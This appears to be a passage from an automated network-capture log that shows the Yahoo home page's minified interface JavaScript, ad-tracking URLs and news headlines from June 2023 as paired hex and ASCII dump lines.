                                                                                                                                                                        Data Ascii: ss$1["ybar-navigation-item"],dropdownOpenClass:Css$1["dropdown-open"],navigationPlacement:function(){return n||(n=document.getElementById("ybar-nav-placement")),n}};t.ybarNav&&init$1(e,t)}));var Css={"notification-container--no-history":"_yb_py0df","toolt
                                                                                                                                                                        2023-06-02 11:13:21 UTC589INData Raw: 76 61 72 20 6e 3b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 26 26 28 74 68 69 73 2e 68 69 73 74 6f 72 79 45 6e 61 62 6c 65 64 26 26 21 65 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 43 4c 41 53 53 5f 4f 50 45 4e 29 2c 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 61 31 31 79 4d 65 6e 75 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 7c 7c 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 74 72 75 65 22 29 2c 74 68 69 73 2e 6c 61 73 74 53 65 65 6e 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65
                                                                                                                                                                        Data Ascii: var n;this.initialized&&(this.historyEnabled&&!e||(document.body.classList.add(CLASS_OPEN),null===(n=this.a11yMenu)||void 0===n||n.setAttribute("aria-expanded","true"),this.lastSeen=(new Date).getTime()))},e.prototype.hide=function(){var e;this.initialize
                                                                                                                                                                        2023-06-02 11:13:21 UTC590INData Raw: 30 5d 2c 22 63 6c 69 63 6b 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 68 69 64 65 28 29 2c 65 2e 6d 61 6e 75 61 6c 6c 79 43 6c 6f 73 65 64 3d 21 30 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 53 75 70 70 6f 72 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 3d 77 69 6e 64 6f 77 7c 7c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 3f 76 6f 69 64 20 30 3a 77 69 6e 64 6f 77 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 48 65 6c 70 65 72 49 6e 73 74 61 6e 63 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 68 65 63 6b 49 73 53 75 70 70 6f 72 74 65 64 42 72 6f 77 73 65 72 28 29 7d 2c 65 2e 70 72 6f 74 6f
                                                                                                                                                                        Data Ascii: 0],"click",(function(){e.hide(),e.manuallyClosed=!0}))},e.prototype.isNotificationsSupported=function(){var e;return null===(e=null===window||void 0===window?void 0:window.subscriptionHelperInstance)||void 0===e?void 0:e.checkIsSupportedBrowser()},e.proto
                                                                                                                                                                        2023-06-02 11:13:21 UTC592INData Raw: 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 2c 69 3d 6e 2e 6e 6f 74 69 66 4d 65 6e 75 2c 6f 3d 6e 2e 6e 6f 74 69 66 4d 65 6e 75 4f 70 65 6e 65 72 2c 73 3d 6e 2e 6e 6f 74 69 66 44 72 6f 70 64 6f 77 6e 2c 72 3d 6e 2e 6e 6f 74 69 66 42 61 64 67 65 2c 61 3d 6e 2e 6e 6f 74 69 66 43 6f 6e 74 61 69 6e 65 72 3b 6e 2e 74 6f 6f 6c 74 69 70 43 6f 6e 74 61 69 6e 65 72 26 26 28 74 3d 6e 65 77 20 50 72 6f 6d 6f 54 6f 6f 6c 74 69 70 28 65 2c 6e 2e 74 6f 6f 6c 74 69 70 43 6f 6e 74 61 69 6e 65 72 29 29 3b 76 61 72 20 63 3d 67 65 74 4e 6f 74 69 66 43 6c 69 65 6e 74 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 28 69 2e 63 68 65 63 6b 65 64 3d 21 31 29 2c 6e 75 6c 6c 3d 3d 73 7c 7c 73 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 79
                                                                                                                                                                        Data Ascii: t=function(e,n){var t,i=n.notifMenu,o=n.notifMenuOpener,s=n.notifDropdown,r=n.notifBadge,a=n.notifContainer;n.tooltipContainer&&(t=new PromoTooltip(e,n.tooltipContainer));var c=getNotifClient(),l=function(){i&&(i.checked=!1),null==s||s.classList.remove("y
                                                                                                                                                                        2023-06-02 11:13:21 UTC593INData Raw: 74 65 6e 65 72 28 73 2c 22 66 6f 63 75 73 69 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 28 69 2e 63 68 65 63 6b 65 64 3d 21 30 29 2c 6e 75 6c 6c 3d 3d 73 7c 7c 73 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 4d 65 6e 75 4f 70 65 6e 22 29 7d 29 29 2c 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 73 2c 22 66 6f 63 75 73 6f 75 74 22 2c 6c 29 2c 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2e 74 6f 6f 6c 74 69 70 43 6f 6e 74 61 69 6e 65 72 2c 22 66 6f 63 75 73 69 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 75 6c 6c 3d 3d 74 7c 7c 74 2e 73 68 6f 77 28 29 7d 29 29 2c 65 2e 61 64 64 45 6c 65 6d 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2e 74 6f 6f 6c 74 69 70 43 6f 6e 74 61 69 6e 65 72 2c 22 66 6f
                                                                                                                                                                        Data Ascii: tener(s,"focusin",(function(){i&&(i.checked=!0),null==s||s.classList.add("ybarMenuOpen")})),e.addElementListener(s,"focusout",l),e.addElementListener(n.tooltipContainer,"focusin",(function(){null==t||t.show()})),e.addElementListener(n.tooltipContainer,"fo
                                                                                                                                                                        2023-06-02 11:13:21 UTC594INData Raw: 73 73 69 73 74 22 3a 74 72 75 65 2c 22 6f 76 65 72 6c 61 79 5f 63 6c 61 73 73 22 3a 22 64 61 72 6b 65 72 22 2c 22 73 63 72 6f 6c 6c 54 68 72 65 73 68 6f 6c 64 22 3a 34 7d 2c 22 63 6f 6d 70 6f 6e 65 6e 74 43 6f 75 6e 74 22 3a 30 2c 22 69 31 38 6e 22 3a 7b 22 72 6f 6f 74 22 3a 7b 22 50 52 4f 50 45 52 54 59 5f 4e 41 4d 45 22 3a 22 59 61 68 6f 6f 20 48 6f 6d 65 22 2c 22 42 41 43 4b 22 3a 22 42 61 63 6b 22 2c 22 4c 49 54 45 5f 55 50 47 52 41 44 45 5f 50 52 4f 4d 50 54 5f 4d 45 53 53 41 47 45 22 3a 22 53 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 74 68 69 73 20 70 61 67 65 20 61 72 65 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 6f 6e 20 79 6f 75 72 20 63 75 72 72 65 6e 74 20 62 72 6f 77 73 65 72 20 76 65 72 73 69 6f 6e 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64
                                                                                                                                                                        Data Ascii: ssist":true,"overlay_class":"darker","scrollThreshold":4},"componentCount":0,"i18n":{"root":{"PROPERTY_NAME":"Yahoo Home","BACK":"Back","LITE_UPGRADE_PROMPT_MESSAGE":"Some parts of this page are not supported on your current browser version. Please upgrad
                                                                                                                                                                        2023-06-02 11:13:21 UTC595INData Raw: 62 66 66 39 0d 0a 3c 64 69 76 20 69 64 3d 73 64 61 2d 4d 41 53 54 20 63 6c 61 73 73 3d 22 20 4d 41 53 54 2d 73 74 61 74 75 73 2d 65 72 72 6f 72 2d 63 6f 6c 6c 61 70 73 65 64 22 3e 3c 64 69 76 20 69 64 3d 73 64 61 2d 4d 41 53 54 2d 69 66 72 61 6d 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 53 70 61 63 65 49 44 3d 32 30 32 33 35 33 38 30 37 35 20 6c 6f 63 3d 4d 41 53 54 20 6e 6f 61 64 20 2d 2d 3e 3c 21 2d 2d 20 66 61 63 32 2d 72 65 70 6c 61 63 65 64 2d 67 64 32 20 62 6f 6f 6b 69 6e 67 20 69 64 20 2d 2d 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 22 20 68 65 69 67 68 74 3d 22 31 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 35 2e 72 61 73 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 61 64 63 6f 75 6e 74 25 37 43 32 2e 30 25 37 43 35 31 31 33 2e
                                                                                                                                                                        Data Ascii: bff9<div id=sda-MAST class=" MAST-status-error-collapsed"><div id=sda-MAST-iframe><noscript>... SpaceID=2023538075 loc=MAST noad -->... fac2-replaced-gd2 booking id --><img width="1" height="1" alt="" src="https://5.ras.yahoo.com/adcount%7C2.0%7C5113.
                                                                                                                                                                        2023-06-02 11:13:21 UTC596INData Raw: 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4d 41 53 54 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70 74 25 32 35 33 41 68 6f 6d 65 25 32 35 33 42 73 69 74 65 25 32 35 33 41 66 70 25 32 35 33 42 76 65 72 25 32 35 33 41 6d 65 67 61 73 74 72 6d 3b 70 76 69 64 3d 37 4d 6a 47 42 7a 45 77 4c 6a 4c 6f 30 73 38 4d 54 58 77 6a 4c 79 6d 37 4d 54 41 79 4c 67 41 41 41 41 43 6b 42 4e 55 75 3b 73 65 63 74 69 6f 6e 69 64 3d 31 34 36 37 35 30 30 35 31 3b 6b 76 73 65 63 75 72 65 25 32 44 64 61 72 6c 61 3d 34 25 32 44 31 31 25 32 44 31 25 37 43 79 73 64 25 37 43 31 3b 6b 76 73 65 63 75 72 65 3d 74 72 75 65 3b 6b 76 6d 6e 3d 79 34 30 36 31 39 36
                                                                                                                                                                        Data Ascii: clntid=1004;spaceid=2023538075;adposition=MAST;lmsid=;revshare=lu%253A0%253Bpt%253Ahome%253Bsite%253Afp%253Bver%253Amegastrm;pvid=7MjGBzEwLjLo0s8MTXwjLym7MTAyLgAAAACkBNUu;sectionid=146750051;kvsecure%2Ddarla=4%2D11%2D1%7Cysd%7C1;kvsecure=true;kvmn=y406196
                                                                                                                                                                        2023-06-02 11:13:21 UTC598INData Raw: 3a 68 6f 6d 65 3b 6b 76 73 73 70 3d 73 73 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6b 74 6e 61 6d 65 3d 75 6e 6b 6e 6f 77 6e 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72 6e 65 74 25 35 46 65 78 70 6c 6f 72 65 72 25 35 46 25 32 44 25 35 46 77 69 6e 64 6f 77 73 3b 6b 76 72 65 70 6f 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 76 65 72 73 69 6f 6e 3d 4e 54 25 32 30 31 30 25 32 45 30 3b 6b 76 61 64 74 63 25 35 46 63 72 6d 63 63 3d
                                                                                                                                                                        Data Ascii: :home;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=internet%5Fexplorer%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5Fdvosversion=NT%2010%2E0;kvadtc%5Fcrmcc=
                                                                                                                                                                        2023-06-02 11:13:21 UTC599INData Raw: 3b 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 27 66 69 6e 61 6e 63 65 55 70 73 65 6c 6c 54 69 63 6b 65 72 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 61 73 75 72 65 28 27 66 69 6e 61 6e 63 65 55 70 73 65 6c 6c 54 69 63 6b 65 72 44 6f 6e 65 27 2c 27 50 61 67 65 53 74 61 72 74 27 2c 27 66 69 6e 61 6e 63 65 55 70 73 65 6c 6c 54 69 63 6b 65 72
                                                                                                                                                                        Data Ascii: ;><script nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> window.performance.mark('financeUpsellTicker'); window.performance.measure('financeUpsellTickerDone','PageStart','financeUpsellTicker
                                                                                                                                                                        2023-06-02 11:13:21 UTC600INData Raw: 6f 69 4e 44 5a 6a 5a 6a 63 7a 59 32 45 74 4e 57 46 6d 4e 53 30 7a 5a 6d 52 6d 4c 57 49 33 59 32 59 74 59 57 49 34 4e 44 56 6b 4e 6a 63 31 4d 54 41 34 49 69 77 69 59 69 49 36 49 6a 4d 33 4f 44 45 78 4e 6a 4d 69 4c 43 4a 6c 49 6a 6f 69 4f 54 67 77 4f 44 6b 32 49 69 77 69 63 79 49 36 49 6c 4a 46 52 31 4a 46 55 31 4e 4a 54 30 35 54 51 30 39 53 52 56 49 69 66 51 3b 70 5f 73 79 73 3a 6a 61 72 76 69 73 3b 22 20 64 61 74 61 2d 75 75 69 64 3d 22 32 66 30 38 39 62 37 62 2d 66 31 65 33 2d 34 37 62 66 2d 39 66 35 61 2d 63 36 39 35 38 65 63 30 32 63 32 34 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 32 66 30 38 39 62 37 62 2d 66 31 65 33 2d 34 37 62 66 2d 39 66 35 61 2d 63 36 39 35 38 65 63 30 32 63 32 34 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d
                                                                                                                                                                        Data Ascii: oiNDZjZjczY2EtNWFmNS0zZmRmLWI3Y2YtYWI4NDVkNjc1MTA4IiwiYiI6IjM3ODExNjMiLCJlIjoiOTgwODk2IiwicyI6IlJFR1JFU1NJT05TQ09SRVIifQ;p_sys:jarvis;" data-uuid="2f089b7b-f1e3-47bf-9f5a-c6958ec02c24" data-wf-caas-uuid="2f089b7b-f1e3-47bf-9f5a-c6958ec02c24" data-wf-caas-
                                                                                                                                                                        2023-06-02 11:13:21 UTC602INData Raw: 61 62 2c 20 74 6f 70 20 43 68 69 6e 65 73 65 20 73 63 69 65 6e 74 69 73 74 20 61 64 6d 69 74 73 3c 2f 68 32 3e 3c 70 20 63 6c 61 73 73 3d 22 4c 69 6e 65 43 6c 61 6d 70 28 34 2c 35 2e 33 65 6d 29 20 4c 69 6e 65 43 6c 61 6d 70 28 33 2c 34 65 6d 29 2d 2d 6d 64 31 32 35 30 20 4c 68 28 31 2e 33 35 29 20 4d 78 28 30 29 20 4d 74 28 30 29 20 4d 62 28 35 70 78 29 22 3e 54 68 65 20 66 6f 72 6d 65 72 20 68 65 61 64 20 6f 66 20 74 68 65 20 43 68 69 6e 65 73 65 20 43 65 6e 74 65 72 20 66 6f 72 20 44 69 73 65 61 73 65 20 43 6f 6e 74 72 6f 6c 20 61 6e 64 20 50 72 65 76 65 6e 74 69 6f 6e 20 61 63 6b 6e 6f 77 6c 65 64 67 65 64 20 74 68 61 74 20 74 68 65 20 76 69 72 75 73 20 63 6f 75 6c 64 20 68 61 76 65 20 65 6d 65 72 67 65 64 20 61 73 20 61 20 72 65 73 75 6c 74 20 6f 66
                                                                                                                                                                        Data Ascii: ab, top Chinese scientist admits</h2><p class="LineClamp(4,5.3em) LineClamp(3,4em)--md1250 Lh(1.35) Mx(0) Mt(0) Mb(5px)">The former head of the Chinese Center for Disease Control and Prevention acknowledged that the virus could have emerged as a result of
                                                                                                                                                                        2023-06-02 11:13:21 UTC603INData Raw: 4f 47 55 30 59 7a 4d 78 5a 6d 49 35 49 69 77 69 59 69 49 36 49 6a 4d 33 4f 44 45 79 4e 44 49 69 4c 43 4a 6c 49 6a 6f 69 4f 54 67 77 4f 54 45 35 49 69 77 69 63 79 49 36 49 6c 4a 46 52 31 4a 46 55 31 4e 4a 54 30 35 54 51 30 39 53 52 56 49 69 66 51 3b 70 5f 73 79 73 3a 6a 61 72 76 69 73 3b 22 20 64 61 74 61 2d 75 75 69 64 3d 22 38 32 37 31 62 33 35 32 2d 32 32 39 61 2d 33 34 31 63 2d 38 35 35 36 2d 32 66 31 62 61 35 38 32 38 35 30 32 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 75 75 69 64 3d 22 38 32 37 31 62 33 35 32 2d 32 32 39 61 2d 33 34 31 63 2d 38 35 35 36 2d 32 66 31 62 61 35 38 32 38 35 30 32 22 20 64 61 74 61 2d 77 66 2d 63 61 61 73 2d 70 72 65 66 65 74 63 68 3d 22 31 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 57 28 31 30 30 25 29 20 4d 69 68 28 35
                                                                                                                                                                        Data Ascii: OGU0YzMxZmI5IiwiYiI6IjM3ODEyNDIiLCJlIjoiOTgwOTE5IiwicyI6IlJFR1JFU1NJT05TQ09SRVIifQ;p_sys:jarvis;" data-uuid="8271b352-229a-341c-8556-2f1ba5828502" data-wf-caas-uuid="8271b352-229a-341c-8556-2f1ba5828502" data-wf-caas-prefetch="1"><img class="W(100%) Mih(5
                                                                                                                                                                        2023-06-02 11:13:21 UTC604INData Raw: 39 61 65 62 36 64 2d 37 31 34 64 2d 33 61 63 65 2d 38 38 64 38 2d 38 65 38 65 37 66 34 61 35 34 62 31 3b 73 6c 6b 3a 57 61 74 63 68 64 6f 67 20 77 61 72 6e 73 20 56 65 6e 6d 6f 2c 20 50 61 79 50 61 6c 2c 20 43 61 73 68 41 70 70 20 75 73 65 72 73 20 3b 63 70 6f 73 79 3a 33 3b 73 73 5f 63 69 64 3a 32 66 30 38 39 62 37 62 2d 66 31 65 33 2d 34 37 62 66 2d 39 66 35 61 2d 63 36 39 35 38 65 63 30 32 63 32 34 3b 61 69 64 3a 63 61 39 33 36 36 33 61 2d 35 35 31 62 2d 33 30 64 61 2d 38 31 33 61 2d 66 30 38 35 63 66 35 31 36 62 30 30 3b 6d 61 62 5f 74 65 73 74 3a 65 79 4a 31 49 6a 6f 69 59 32 45 35 4d 7a 59 32 4d 32 45 74 4e 54 55 78 59 69 30 7a 4d 47 52 68 4c 54 67 78 4d 32 45 74 5a 6a 41 34 4e 57 4e 6d 4e 54 45 32 59 6a 41 77 49 69 77 69 59 69 49 36 49 6a 4d 33 4f
                                                                                                                                                                        Data Ascii: 9aeb6d-714d-3ace-88d8-8e8e7f4a54b1;slk:Watchdog warns Venmo, PayPal, CashApp users ;cposy:3;ss_cid:2f089b7b-f1e3-47bf-9f5a-c6958ec02c24;aid:ca93663a-551b-30da-813a-f085cf516b00;mab_test:eyJ1IjoiY2E5MzY2M2EtNTUxYi0zMGRhLTgxM2EtZjA4NWNmNTE2YjAwIiwiYiI6IjM3O
                                                                                                                                                                        2023-06-02 11:13:21 UTC605INData Raw: 64 61 74 61 2d 79 6c 6b 3d 22 65 6c 6d 3a 72 68 64 6c 6e 3b 62 70 6f 73 3a 31 3b 63 6e 74 5f 74 70 63 3a 4e 65 65 64 20 54 6f 20 4b 6e 6f 77 3b 63 70 6f 73 3a 31 3b 67 72 70 74 3a 72 6f 75 6e 64 75 70 3b 69 74 63 3a 30 3b 70 6b 67 74 3a 6e 65 65 64 5f 74 6f 5f 6b 6e 6f 77 3b 70 6f 73 3a 34 3b 73 75 62 73 65 63 3a 6e 65 65 64 74 6f 6b 6e 6f 77 3b 63 63 6f 64 65 3a 6e 74 6b 5f 73 69 6e 67 6c 65 5f 66 65 65 64 5f 5f 65 6e 2d 55 53 5f 5f 66 72 6f 6e 74 70 61 67 65 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 66 61 75 6c 74 5f 5f 64 65 73 6b 74 6f 70 5f 5f 67 61 5f 5f 6e 6f 53 70 6c 69 74 3b 63 74 3a 73 74 6f 72 79 3b 65 78 70 62 3a 30 3b 67 3a 64 33 39 30 39 34 38 63 2d 62 32 32 34 2d 33 33 62 63 2d 62 37 32 34 2d 66 35 30 34 33 64 31 32 33 61 34 62 3b 73 6c 6b 3a
                                                                                                                                                                        Data Ascii: data-ylk="elm:rhdln;bpos:1;cnt_tpc:Need To Know;cpos:1;grpt:roundup;itc:0;pkgt:need_to_know;pos:4;subsec:needtoknow;ccode:ntk_single_feed__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;expb:0;g:d390948c-b224-33bc-b724-f5043d123a4b;slk:
                                                                                                                                                                        2023-06-02 11:13:21 UTC607INData Raw: 5a 28 31 29 22 3e 3c 61 20 63 6c 61 73 73 3d 22 50 6f 73 28 72 29 20 44 28 62 29 20 4d 65 6e 64 28 39 70 78 29 20 43 28 2d 2d 63 6f 62 61 6c 74 29 20 43 28 2d 2d 64 6f 72 79 29 3a 68 20 43 28 2d 2d 64 6f 72 79 29 3a 66 20 4f 28 6e 29 3a 66 20 4f 70 28 30 2e 39 29 3a 68 20 4f 70 28 30 2e 39 29 3a 66 20 54 64 28 6e 29 20 57 28 61 29 20 6e 74 6b 2d 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 6a 73 2d 63 6f 6e 74 65 6e 74 2d 76 69 65 77 65 72 20 72 61 70 69 64 6e 6f 66 6f 6c 6c 6f 77 20 77 61 66 65 72 2d 63 61 61 73 22 20 68 72 65 66 3d 22 2f 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 2f 70 61 6e 73 79 2d 64 69 76 69 73 69 6f 6e 2d 6f 6e 65 2d 6f 66 2d 72 6f 63 6b 73 2d 66 69 72 73 74 2d 6f 70 65 6e 6c 79 2d 67 61 79 2d 62 61 6e 64 73 2d 31 35 32 35 34 37 37 30 31 2e 68
                                                                                                                                                                        Data Ascii: Z(1)"><a class="Pos(r) D(b) Mend(9px) C(--cobalt) C(--dory):h C(--dory):f O(n):f Op(0.9):h Op(0.9):f Td(n) W(a) ntk-footer-link js-content-viewer rapidnofollow wafer-caas" href="/entertainment/pansy-division-one-of-rocks-first-openly-gay-bands-152547701.h
                                                                                                                                                                        2023-06-02 11:13:21 UTC608INData Raw: 2c 34 65 6d 29 21 2d 2d 6d 64 31 31 30 30 20 54 28 37 30 25 29 20 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 3a 66 5f 54 64 28 6e 29 20 53 74 61 72 74 28 32 70 78 29 20 54 64 28 75 29 3a 68 22 3e 48 6f 77 20 61 6e 20 6f 70 65 6e 6c 79 20 67 61 79 20 62 61 6e 64 20 69 6e 20 31 39 39 33 20 62 6c 61 7a 65 64 20 61 20 74 72 61 69 6c 20 66 65 6c 74 20 74 6f 64 61 79 3c 2f 68 33 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 74 6b 2d 69 74 65 6d 20 57 28 31 2f 35 29 20 57 68 73 28 6e 29 20 56 61 28 74 29 20 44 28 69 62 29 20 4c 74 73 28 30 29 20 42 64 65 6e 64 28 6e 6f 6e 65 29 20 50 6f 73 28 72 29 22 20 64 61 74 61 2d 74 79 70 65 3d 22 31 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 73 28 72 29 20
                                                                                                                                                                        Data Ascii: ,4em)!--md1100 T(70%) js-stream-content-link:f_Td(n) Start(2px) Td(u):h">How an openly gay band in 1993 blazed a trail felt today</h3></a></div></li><li class="ntk-item W(1/5) Whs(n) Va(t) D(ib) Lts(0) Bdend(none) Pos(r)" data-type="1"><div class="Pos(r)
                                                                                                                                                                        2023-06-02 11:13:21 UTC609INData Raw: 2e 32 2f 59 35 62 57 5f 5f 53 69 74 57 43 31 47 36 34 31 45 43 47 65 75 67 2d 2d 7e 42 2f 5a 6d 6b 39 63 33 52 79 61 57 30 37 61 44 30 78 4e 6a 41 37 63 54 30 34 4d 44 74 33 50 54 4d 30 4d 44 74 68 63 48 42 70 5a 44 31 35 64 47 46 6a 61 48 6c 76 62 67 2d 2d 2f 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6f 73 2f 63 72 65 61 74 72 2d 75 70 6c 6f 61 64 65 64 2d 69 6d 61 67 65 73 2f 32 30 32 33 2d 30 35 2f 35 34 31 62 39 62 61 30 2d 30 30 66 66 2d 31 31 65 65 2d 61 66 37 35 2d 38 38 64 39 62 38 30 38 31 63 36 35 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 2f 3e 3c 68 33 20 63 6c 61 73 73 3d 22 4d 78 28 30 29 20 4d 62 28 30 29 20 4d 74 28 34 70 78 29 20 46 7a 28 31 32 70 78 29 20 4c 69 6e 65 43 6c 61 6d 70 28 32 2c 32 2e 36 65 6d 29 20 4c 69 6e
                                                                                                                                                                        Data Ascii: .2/Y5bW__SitWC1G641ECGeug--~B/Zmk9c3RyaW07aD0xNjA7cT04MDt3PTM0MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2023-05/541b9ba0-00ff-11ee-af75-88d9b8081c65.cf.jpg" alt=""/><h3 class="Mx(0) Mb(0) Mt(4px) Fz(12px) LineClamp(2,2.6em) Lin
                                                                                                                                                                        2023-06-02 11:13:21 UTC610INData Raw: 64 61 74 61 2d 77 69 6b 69 73 3d 22 44 6f 6e 61 6c 64 5f 54 72 75 6d 70 2c 50 72 65 73 69 64 65 6e 63 79 5f 6f 66 5f 44 6f 6e 61 6c 64 5f 54 72 75 6d 70 2c 4b 61 79 6c 65 69 67 68 5f 4d 63 45 6e 61 6e 79 2c 52 6f 6e 5f 44 65 53 61 6e 74 69 73 22 20 64 61 74 61 2d 70 72 6f 70 65 72 74 79 3d 22 50 6f 6c 69 74 69 63 73 22 20 64 61 74 61 2d 68 61 73 2d 63 6c 75 73 74 65 72 3d 22 74 72 75 65 22 20 64 61 74 61 2d 69 31 33 6e 2d 63 66 67 3d 22 7b 26 71 75 6f 74 3b 62 70 6f 73 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 4c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 50 6f 6c 69 74 69 63 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 63 70 6f 73 26 71 75 6f 74 3b 3a 32 2c 26 71 75 6f 74 3b 63 70 6f 73 79 26 71 75 6f 74 3b 3a 37 7d 22 20
                                                                                                                                                                        Data Ascii: data-wikis="Donald_Trump,Presidency_of_Donald_Trump,Kayleigh_McEnany,Ron_DeSantis" data-property="Politics" data-has-cluster="true" data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Politics&quot;,&quot;cpos&quot;:2,&quot;cposy&quot;:7}"
                                                                                                                                                                        2023-06-02 11:13:21 UTC612INData Raw: 65 39 65 64 62 30 65 64 63 63 2e 63 66 2e 6a 70 67 22 20 61 6c 74 3d 22 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 69 6d 61 67 65 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 65 6e 64 28 34 35 70 78 29 20 4f 76 28 68 29 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 46 7a 28 31 36 70 78 29 20 46 77 28 62 29 20 54 74 28 63 29 20 44 28 69 62 29 20 4d 62 28 34 70 78 29 20 4d 65 6e 64 28 39 70 78 29 20 4c 68 28 31 29 20 43 28 24 63 61 74 2d 70 6f 6c 69 74 69 63 73 29 22 20 64 61 74 61 2d 74 65 73 74 2d 6c 6f 63 61 74 6f 72 3d 22 73 74 72 65 61 6d 2d 69 74 65 6d 2d 63 61 74 65 67 6f 72 79 2d 6c 61 62 65 6c 22 3e 50 6f 6c 69 74 69 63 73 3c 2f 64 69 76 3e 3c
